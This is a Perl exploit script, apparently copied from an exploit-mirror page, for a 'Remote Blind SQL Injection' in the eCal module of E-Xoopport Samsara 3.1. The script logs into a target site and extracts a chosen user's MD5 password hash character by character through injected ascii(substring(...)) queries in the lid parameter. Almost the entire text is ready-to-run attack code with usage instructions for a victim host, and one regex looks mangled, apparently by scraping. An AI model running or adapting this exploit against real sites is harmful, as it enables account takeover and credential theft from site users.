扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 |
#!/usr/bin/perl # [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit # Author/s: _mRkZ_, WaRWolFz Crew # Created: 2010.09.12 after 0 days the bug was discovered. # Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew # Web Site: www.warwolfz.org use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; $^O eq 'MSWin32' ? system('cls') : system('clear'); print " E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport| | Affected versions: 3.1| | Bug: Remote Blind SQL Injection (eCal module) | | Author/s: _mRkZ_, WaRWolFz Crew | | Greetz: Dante90, Shaddy, StutM, WarWolFz Crew | | Web Site: www.warwolfz.org| +---------------------------------------------------+ | Warn: You must be able to access to 'eCal' Module | +---------------------------------------------------+ \r\n"; if (@ARGV != 4) { print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n"; exit; } my $host= $ARGV[0]; my $usr = $ARGV[1]; my $pwd = $ARGV[2]; my $anickde = $ARGV[3]; my $anick = '0x'.EncHex($anickde); print "[!] Logging In...\r\n"; my %postdata = ( uname => "$usr", pass => "$pwd", op => "login" ); my $cookies = HTTP::Cookies->new( autosave => 1, ); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); $ua->cookie_jar($cookies); my $req = (POST $host."/user.php", \%postdata); my $request = $ua->request($req); my $content = $request->content; if ($content =~ /<h4>Benvenuto su/i) { print "[+] Logged in!\r\n"; } else { print "[-] Fatal Error: username/password incorrect?\r\n"; exit; } print "[!] Checking permissions...\r\n"; $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); $req = $host."/modules/eCal/location.php?lid=1+AND+1=1"; $ua->cookie_jar($cookies); $request = $ua->get($req); $content = $request->content; if ($content !~ /<b>Eventi nella località: <\/b>/ig) { print "[+] Fatal Error: Access denied\r\n"; exit; } else { print "[+] You have permissions\r\n"; } print "[!] Exploiting...\r\n"; my $i = 1; my $pwdchr; while ($i != 33) { my $wn = 47; while (1) { $wn++; my $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); my $req = $host."/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn"; $ua->cookie_jar($cookies); my $request = $ua->get($req); my $content = $request->content; open LOGZZ, '>lol.html'; print LOGZZ $content; close LOGZZ; if ($content !~ /<b>Eventi nella località: <\/b><a href='https://www.exploit-db.com/exploits/15110/localleve\.php\?lid='>/ig) { my $cnt = $1; $pwdchr .= chr($wn); $^O eq 'MSWin32' ? system('cls') : system('clear'); PrintChars($anickde, $pwdchr); last; } } $i++; } print "\r\n[!] Exploiting completed!\r\n\r\n"; print "Visit: www.warwolfz.org\r\n\r\n"; sub PrintChars { my $anick1 = $_[0]; my $chars = $_[1]; print " E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport| | Affected versions: 3.1| | Bug: Remote Blind SQL Injection (eCal module) | | Author/s: _mRkZ_, WaRWolFz Crew | | Greetz: Dante90, Shaddy, StutM, WarWolFz Crew | | Web Site: www.warwolfz.org| +---------------------------------------------------+ | Warn: You must be able to access to 'eCal' Module | +---------------------------------------------------+ [!] Logging In... [+] Logged in! [!] Checking permissions... [+] You have permissions [!] Exploiting... [+] ".$anick1."'s md5 Password: ".$chars." "; } sub EncHex { my $char = $_[0]; chomp $char; my @trans = unpack("H*", "$char"); return $trans[0]; } #[Unit-X] Vuln-X DB 2010.09.21 |
体验盒子
